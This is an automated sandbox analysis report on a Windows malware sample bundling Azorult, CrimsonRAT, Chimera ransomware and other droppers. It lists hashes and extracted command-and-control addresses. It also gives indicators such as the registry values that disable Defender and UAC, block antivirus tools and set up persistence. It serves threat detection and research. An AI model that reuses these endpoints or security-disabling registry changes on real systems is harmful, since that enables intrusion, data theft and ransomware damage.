Analysis
-
max time kernel
534s -
max time network
628s -
platform
windows10-ltsc_2021_x64 -
resource
win10ltsc2021-20250314-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system -
submitted
31/03/2025, 12:57
Static task
static1
Behavioral task
behavioral1
Sample
v.exe
Resource
win10ltsc2021-20250314-en
General
-
Target
v.exe
-
Size
844KB
-
MD5
7ecfc8cd7455dd9998f7dad88f2a8a9d
-
SHA1
1751d9389adb1e7187afa4938a3559e58739dce6
-
SHA256
2e67d5e7d96aec62a9dda4c0259167a44908af863c2b3af2a019723205abba9e
-
SHA512
cb05e82b17c0f7444d1259b661f0c1e6603d8a959da7475f35078a851d528c630366916c17a37db1a2490af66e5346309177c9e31921d09e7e795492868e678d
-
SSDEEP
12288:GaWzgMg7v3qnCiWErQohh0F49CJ8lnybQg9BFg9UmTRHlM:BaHMv6CGrjBnybQg+mmhG
Malware Config
Extracted
crimsonrat
185.136.161.124
Extracted
azorult
http://boglogov.site/index.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Azorult family
-
Chimera 64 IoCs
Ransomware which infects local and network files, often distributed via Dropbox links.
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-ae\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-gb\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hr-hr\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\zh-tw\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\nl-nl\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\it-it\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\zh-cn\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\sv-se\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ru-ru\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\nl-nl\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-gb\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sk-sk\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\hr-hr\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\es-es\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\root\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\hr-hr\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files\dotnet\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\it-it\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\eu-es\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nl-nl\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-tw\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fi-fi\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\hu-hu\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-cn\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pl-pl\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\en-us\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ja-jp\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ca-es\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\hr-hr\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\hr-hr\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ko-kr\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ja-jp\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pl-pl\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\themes\dark\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\pl-pl\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-fr\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\hr-hr\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files\Java\jre-1.8\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ro-ro\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fi-fi\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\pl-pl\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\da-dk\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-fr\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sv-se\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\pt-br\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\es-es\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\zh-cn\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\ja-jp\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\plugins\rhp\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\uk-ua\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\root\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sl-si\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ja-jp\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files\VideoLAN\VLC\plugins\access\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files\VideoLAN\VLC\lua\http\dialogs\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe -
Chimera Ransomware Loader DLL 1 IoCs
Drops/unpacks executable file which resembles Chimera's Loader.dll.
resource yara_rule behavioral1/memory/6640-2389-0x0000000010000000-0x0000000010010000-memory.dmp chimera_loader_dll -
Chimera family
-
CrimsonRAT main payload 1 IoCs
resource yara_rule behavioral1/files/0x0007000000028067-2233.dat family_crimsonrat -
CrimsonRat
Crimson RAT is a malware linked to a Pakistani-linked threat actor.
-
Crimsonrat family
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" Azorult.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" Azorult.exe -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" taskhostw.exe -
Rms family
-
UAC bypass 3 TTPs 5 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" regedit.exe -
Windows security bypass 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths regedit.exe -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
pid Process 3084 net.exe 5012 net1.exe -
Renames multiple (106) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Renames multiple (3272) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Blocks application from running via registry modification 13 IoCs
Adds application to list of disallowed applications.
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" Azorult.exe Key created \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" Azorult.exe Set value (int) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" Azorult.exe -
Downloads MZ/PE file 23 IoCs
flow pid Process 273 5608 chrome.exe 273 5608 chrome.exe 273 5608 chrome.exe 273 5608 chrome.exe 273 5608 chrome.exe 273 5608 chrome.exe 273 5608 chrome.exe 273 5608 chrome.exe 273 5608 chrome.exe 273 5608 chrome.exe 273 5608 chrome.exe 273 5608 chrome.exe 273 5608 chrome.exe 273 5608 chrome.exe 273 5608 chrome.exe 273 5608 chrome.exe 273 5608 chrome.exe 273 5608 chrome.exe 273 5608 chrome.exe 273 5608 chrome.exe 273 5608 chrome.exe 273 5608 chrome.exe 273 5608 chrome.exe -
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Azorult.exe -
Modifies Windows Firewall 2 TTPs 23 IoCs
pid Process 7392 netsh.exe 7964 netsh.exe 6792 netsh.exe 5420 netsh.exe 7308 netsh.exe 8188 netsh.exe 5104 netsh.exe 2276 netsh.exe 6136 netsh.exe 440 netsh.exe 6980 netsh.exe 4840 netsh.exe 7576 netsh.exe 5016 netsh.exe 7776 netsh.exe 6872 netsh.exe 6004 netsh.exe 5804 netsh.exe 2176 netsh.exe 5144 netsh.exe 4864 netsh.exe 2844 netsh.exe 7040 netsh.exe -
Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe -
Sets file to hidden 1 TTPs 3 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 4512 attrib.exe 5796 attrib.exe 8064 attrib.exe -
Stops running service(s) 4 TTPs
-
Checks computer location settings 2 TTPs 13 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Control Panel\International\Geo\Nation VanToM-Rat.bat Key value queried \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Control Panel\International\Geo\Nation winlogon.exe Key value queried \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Control Panel\International\Geo\Nation taskhost.exe Key value queried \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Control Panel\International\Geo\Nation Azorult.exe Key value queried \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Control Panel\International\Geo\Nation CrimsonRAT.exe Key value queried \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Control Panel\International\Geo\Nation wini.exe Key value queried \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Control Panel\International\Geo\Nation cheat.exe Key value queried \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Control Panel\International\Geo\Nation R8.exe Key value queried \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Control Panel\International\Geo\Nation winlog.exe Key value queried \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 64 IoCs
pid Process 5380 website ip grabber.exe 4208 CookieClickerHack.exe 2088 CrimsonRAT.exe 4940 dlrarhsiva.exe 1448 VanToM-Rat.bat 4000 Server.exe 2340 butterflyondesktop.exe 4576 butterflyondesktop.tmp 6640 HawkEye (1).exe 5468 ButterflyOnDesktop.exe 6848 Azorult.exe 3952 wini.exe 3556 winit.exe 824 rutserv.exe 4536 rutserv.exe 7072 cheat.exe 3544 rutserv.exe 3268 taskhost.exe 1764 ink.exe 7136 rutserv.exe 5592 P.exe 6912 rfusclient.exe 6568 rfusclient.exe 5296 R8.exe 8132 rfusclient.exe 8028 winlog.exe 5740 winlogon.exe 5984 taskhostw.exe 2160 taskhostw.exe 7696 taskhostw.exe 7732 winlogon.exe 7788 Rar.exe 3784 RDPWInst.exe 7300 RDPWInst.exe 7524 taskhostw.exe 3476 taskhostw.exe 5784 taskhostw.exe 2740 taskhostw.exe 5952 taskhostw.exe 5956 taskhostw.exe 2476 taskhostw.exe 7068 taskhostw.exe 5284 taskhostw.exe 2844 taskhostw.exe 5892 taskhostw.exe 7280 Anap.a.exe 7832 taskhostw.exe 6564 taskhostw.exe 7040 taskhostw.exe 4400 taskhostw.exe 5416 taskhostw.exe 3076 taskhostw.exe 8056 Bugsoft.exe 7648 taskhostw.exe 464 taskhostw.exe 7936 taskhostw.exe 8084 taskhostw.exe 7128 taskhostw.exe 6268 taskhostw.exe 4432 Duksten.exe 6564 taskhostw.exe 6620 taskhostw.exe 7640 taskhostw.exe 8148 taskhostw.exe -
Loads dropped DLL 1 IoCs
pid Process 7004 svchost.exe -
Modifies file permissions 1 TTPs 62 IoCs
pid Process 2760 icacls.exe 5016 icacls.exe 5736 icacls.exe 3316 icacls.exe 4692 icacls.exe 4352 icacls.exe 5584 icacls.exe 5776 icacls.exe 5632 icacls.exe 8072 icacls.exe 7392 icacls.exe 5908 icacls.exe 5184 icacls.exe 5564 icacls.exe 3476 icacls.exe 8188 icacls.exe 6508 icacls.exe 5836 icacls.exe 5500 icacls.exe 4596 icacls.exe 676 icacls.exe 380 icacls.exe 7416 icacls.exe 7312 icacls.exe 7480 icacls.exe 4040 icacls.exe 5500 icacls.exe 2496 icacls.exe 6044 icacls.exe 5528 icacls.exe 1956 icacls.exe 7648 icacls.exe 7708 icacls.exe 7180 icacls.exe 5400 icacls.exe 4720 icacls.exe 2228 icacls.exe 3596 icacls.exe 7316 icacls.exe 2044 icacls.exe 6964 icacls.exe 448 icacls.exe 3556 icacls.exe 3628 icacls.exe 7344 icacls.exe 4488 icacls.exe 7800 icacls.exe 7760 icacls.exe 2012 icacls.exe 7008 icacls.exe 2864 icacls.exe 8016 icacls.exe 6640 icacls.exe 6980 icacls.exe 324 icacls.exe 7680 icacls.exe 7536 icacls.exe 1208 icacls.exe 4796 icacls.exe 4752 icacls.exe 6892 icacls.exe 7976 icacls.exe -
Modifies system executable filetype association 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command\ = "\"C:\\Users\\Admin\\Downloads\\Gruel.a.exe\" %1" Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "\"C:\\Users\\Admin\\Downloads\\Gruel.a.exe\" %1" Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command\ = "\"C:\\Users\\Admin\\Downloads\\Gruel.a.exe\" %1" Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"C:\\Users\\Admin\\Downloads\\Gruel.a.exe\" %1" Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas\command\ = "\"C:\\Users\\Admin\\Downloads\\Gruel.a.exe\" %1" Gruel.a.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Adds Run key to start application 2 TTPs 10 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ButterflyOnDesktop butterflyondesktop.tmp Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" taskhostw.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\MediaPath = "C:\\Rundll32.exe" Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\Y = "C:\\Windows\\Y.Htm.Vbs" WScript.exe Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Server = "C:\\Users\\Admin\\AppData\\Roaming\\VanToM Folder\\Server.exe" Server.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\XRF = "C:\\Windows\\system32\\PrTecTor.exe" Duksten.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Rundll32 = "C:\\Rundll32.exe" Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnceEX\DevicePath = "C:\\Rundll32.exe" Gruel.a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Y = "C:\\Windows\\System32\\Y.Htm.Vbs" WScript.exe Set value (str) \REGISTRY\USER\S-1-5-21-3174447216-2582055397-1659630574-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Server = "C:\\Users\\Admin\\Downloads\\VanToM-Rat.bat" VanToM-Rat.bat -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Azorult.exe -
pid Process 7656 powershell.exe -
Drops desktop.ini file(s) 25 IoCs
